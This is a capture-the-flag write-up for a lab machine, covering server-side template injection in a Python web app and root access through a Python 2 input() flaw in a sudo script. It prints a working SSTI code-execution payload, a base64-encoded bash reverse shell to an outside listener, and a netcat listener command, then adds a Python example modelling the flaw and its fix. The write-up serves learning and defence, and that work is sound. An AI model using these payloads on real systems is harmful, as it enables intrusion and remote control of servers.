Tufan Al-Aqsa Machine Write up

IP: 10.0.0.133

Enumeration

We start by scanning the machine with nmap.

Discover all open ports:

Check what is exactly running on these ports:

Foothold

There is a Python web application running on port 80.

Visiting it we get:

If we try to inspect the source code, surprisingly we can't!

Trying to fetch the robots.txt file:

We get an error page, and we notice that the requested file name is reflected in the error message.

Since it is a Python web application that reflects our input into the page, it may be vulnerable to server-side template injection (SSTI).

So to check, we try the famous {{7*7}} SSTI payload.

As we can see, it returned 49, which proves the template engine evaluates our input and the page is vulnerable.

So we now try to find a payload that leads to RCE, and then get a reverse shell.

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

We have successfully run the id command.

For reverse shell:

First we set up a listener:

nc -nvlp 1234

Then we prepare a reverse shell payload (you can use https://www.revshells.com/ to generate one):

/bin/bash -i >& /dev/tcp/10.0.0.132/1234 0>&1

Encode it with base64:

echo '/bin/bash -i >& /dev/tcp/10.0.0.132/1234 0>&1' | base64 

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xMzIvMTIzNCAwPiYxCg==

The final payload echoes the encoded string, decodes it and pipes it to bash. This way the special characters in the reverse shell command (redirections, slashes, ampersands) never go through the URL or the template engine directly, so we won't face any problems running commands.

http://10.0.0.133/{{request.application.__globals__.__builtins__.__import__('os').popen('echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xMzIvMTIzNCAwPiYxCg== | base64 -d | bash').read()}}

And we get the reverse shell.
We can find the user.txt flag inside the home directory for the user zoznoor23. 🇵🇸

Privilege Escalation

We run sudo -l to check what the user zoznoor23 can run with sudo.
So the user zoznoor23 can run /opt/i_dont_trust_sudo.py with python2 as root. Let us try running it:
It asks for a password, but we do not have any.

Let us read the file to understand how it works, or to get a clue about what the password is.

So basically the code reads a password from /root/password.txt and checks whether our input matches it; if it does, it runs /bin/bash, giving us a shell as root.

Since we did not find any clue, we should look somewhere else.

What is interesting here is that the script uses Python 2 while Python 3 exists on the machine, which is odd.

Searching for Python 2 vulnerabilities, we find that the input() function in Python 2 is dangerous.

The problem with input() in Python 2 is that it evaluates whatever the user types as a Python expression in the script's scope (it is equivalent to eval(raw_input())), so any variable or function in that scope can be reached just by typing its name. Two ways this is abused:

  • A variable name as the input
  • A function name as the input

Read about the vulnerability.

So in our case we just need to provide secure_password as our input, and we get a shell as root.
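Why the Python 2 input() check can be bypassed, and what the fix looks like, modelled in Python 3 as an added example (this is not the script from the machine; the variable name secure_password is inferred from the write-up, the password value is constructed, and the sample script is an approximation of the logic described above):

```python
import ast
import hmac
from typing import List

SECRET = "correct-horse"  # constructed stand-in for the contents of /root/password.txt


def py2_style_check(user_text: str) -> bool:
    """Mimics the vulnerable script. Python 2's input() is eval(raw_input()), and
    eval() with no explicit namespaces runs in this frame, so the typed text can
    name the local variable that holds the real password."""
    secure_password = SECRET  # variable name assumed from the write-up
    entered = eval(user_text)  # Python 2 input() behaviour, deliberately unsafe
    return entered == secure_password


def hardened_check(user_text: str) -> bool:
    """Fix: treat the text as opaque data (raw_input() in Python 2, input() in
    Python 3) and compare it in constant time."""
    secure_password = SECRET
    return hmac.compare_digest(user_text.encode(), secure_password.encode())


def find_input_calls(source: str) -> List[int]:
    """Audit helper: line numbers of bare input() calls in a Python 2 script that
    the Python 3 parser still accepts (no print statements etc.). Each hit should
    be changed to raw_input() or otherwise reviewed."""
    return [
        node.lineno
        for node in ast.walk(ast.parse(source))
        if isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id == "input"
    ]


# Constructed approximation of the sudo script's logic (the write-up only shows
# it as a screenshot); it is parsed by find_input_calls, never executed.
SAMPLE_SCRIPT = (
    "secure_password = open('/root/password.txt').read().strip()\n"
    "guess = input('Password: ')\n"
    "if guess == secure_password:\n"
    "    import os; os.system('/bin/bash')\n"
)
```

Typing the quoted real password passes both checks, but typing the bare variable name only passes the Python 2 style check; the audit helper flags line 2 of the sample script as the call to change.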

Now we can go to the home directory for the root user and read root.txt flag.

This post is licensed under CC BY 4.0 by the author.